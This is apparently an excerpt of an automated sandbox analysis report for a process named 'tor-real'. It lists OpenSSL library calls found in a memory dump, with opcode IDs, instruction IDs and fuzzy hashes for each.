                                                                            • Opcode ID: 6f50c7a186075812321a43fbb562b7eccbfd7bb0b81b5122d3a624c37fa0fb20
                                                                            • Instruction ID: 279b401413a18919a95df32738d113197ece3edfce06ab08565258667a800eaf
                                                                            • Opcode Fuzzy Hash: 6f50c7a186075812321a43fbb562b7eccbfd7bb0b81b5122d3a624c37fa0fb20
                                                                            • Instruction Fuzzy Hash: D0F0A5B12093059FE3009F91E44539BBBE0BB80358F10891DE5E81B650C7BD95889F97
                                                                            APIs
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0940C8
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094107
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_freeR_put_error
                                                                            • String ID: R
                                                                            • API String ID: 2647299623-1466425173
                                                                            • Opcode ID: ce30a5f904ef9a446c1ee4fe877651eda22bd084ce21b6ea036fe32392d5d14d
                                                                            • Instruction ID: d17afbc77cfa001655bd545b824a713a9feb2696dfab32c8801d70ff4ec1d9fd
                                                                            • Opcode Fuzzy Hash: ce30a5f904ef9a446c1ee4fe877651eda22bd084ce21b6ea036fe32392d5d14d
                                                                            • Instruction Fuzzy Hash: 07E01AB6A083009FD7009F54D84038ABBE0FBC5329F45882DE59847750C3B9A5498F46
                                                                            APIs
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0E0F0B
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorY_free
                                                                            • String ID: D$P
                                                                            • API String ID: 3485142574-307317852
                                                                            • Opcode ID: 5160445259557b51f5ea7c915fe9796139005af299a7b5d11fc56a261a531835
                                                                            • Instruction ID: 40c41c29c13e46fd9a7660f7c4edcbbc81afdb747701afd3d07b74a69c587e20
                                                                            • Opcode Fuzzy Hash: 5160445259557b51f5ea7c915fe9796139005af299a7b5d11fc56a261a531835
                                                                            • Instruction Fuzzy Hash: A2E012B22087108BD3009F54E84038EBBE0EB84719F11882EE29857700CBB995488BC3
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094BBF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 1767461275-3696090935
                                                                            • Opcode ID: 7f4742fd1356ecfe5c6522db9ba809a694d260ba996ae6c9d07f59f7fbaaf270
                                                                            • Instruction ID: 639c9a52b0ce1bd13145a9dbab607bd76b287635173296687e1d4fff3e09d921
                                                                            • Opcode Fuzzy Hash: 7f4742fd1356ecfe5c6522db9ba809a694d260ba996ae6c9d07f59f7fbaaf270
                                                                            • Instruction Fuzzy Hash: 11E0C2B2108301CEE3008F55E40438AB7D0FBC0314F00C82DE1AC07610C3BA51888B56
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA781
                                                                            • BIO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA789
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeR_put_error
                                                                            • String ID: |
                                                                            • API String ID: 3735976985-2343686810
                                                                            • Opcode ID: de6928c92091fe54a785d7fd4c893fcce128f8904ff430487e01bcdc1fdd9ab3
                                                                            • Instruction ID: 842ae631a9fedd6c881c872419498a057e725c428f3835648ad356867baf5b71
                                                                            • Opcode Fuzzy Hash: de6928c92091fe54a785d7fd4c893fcce128f8904ff430487e01bcdc1fdd9ab3
                                                                            • Instruction Fuzzy Hash: C1E0ECB25083158FE3109F58E44435BFBE0AB84359F01891DD1D857750C779A5488BC6
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094D17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 1767461275-3696090935
                                                                            • Opcode ID: a7bfcf66838acb6538b3156eb8e193717993687c6c8e8da1efb7831251fdc108
                                                                            • Instruction ID: 8ab278df7da336a75fe27ff088e877453dbc9c44011340ff3d35aec496a2c962
                                                                            • Opcode Fuzzy Hash: a7bfcf66838acb6538b3156eb8e193717993687c6c8e8da1efb7831251fdc108
                                                                            • Instruction Fuzzy Hash: C5D05EB2108305CEE7009FA1E40438BBBE0FB80318F00881DD5DC47250D3BA51988B56
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0E0979
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: &$D
                                                                            • API String ID: 1767461275-1138263919
                                                                            • Opcode ID: bb272e1091a3bf9b4c4eb0664ac93c21f81e75349c03af7144b9e78e8d7f246d
                                                                            • Instruction ID: 3254d1b0992aee3e6862244c08339c76b95cb92d3468a0c9eda79a315d1141a6
                                                                            • Opcode Fuzzy Hash: bb272e1091a3bf9b4c4eb0664ac93c21f81e75349c03af7144b9e78e8d7f246d
                                                                            • Instruction Fuzzy Hash: 0BD017B26083158FD7008F84E40538AFBE0EB80318F00882DE69857750C7B995088B8A
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094EB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 1767461275-3696090935
                                                                            • Opcode ID: 6a63e742fcf99e9c4c61edb0920662329d15cd666acff80495b28b9f9de71389
                                                                            • Instruction ID: 82ee535f7d23be2288cb4654e67cde193a8ea622e6d5bcaf707f670332405081
                                                                            • Opcode Fuzzy Hash: 6a63e742fcf99e9c4c61edb0920662329d15cd666acff80495b28b9f9de71389
                                                                            • Instruction Fuzzy Hash: D3D05EF1008301DFE704CF51C40538ABBE1BBC0314F14C80CE4E80B350C7BA55989B56
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0D2447
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: ?$A
                                                                            • API String ID: 1767461275-541453087
                                                                            • Opcode ID: 76f6e79bc22447177d0969a426d700794a822969c8ff68d878fa4be66a7c5eae
                                                                            • Instruction ID: 39d537bfaa57f8760045f65a47d81f7210f5855437c495f4282d29c0d15d0371
                                                                            • Opcode Fuzzy Hash: 76f6e79bc22447177d0969a426d700794a822969c8ff68d878fa4be66a7c5eae
                                                                            • Instruction Fuzzy Hash: 82D0C9B144C3029FD7009F00C00834ABBE0BB40304F41C81DD5D81B650C7B9A9898F06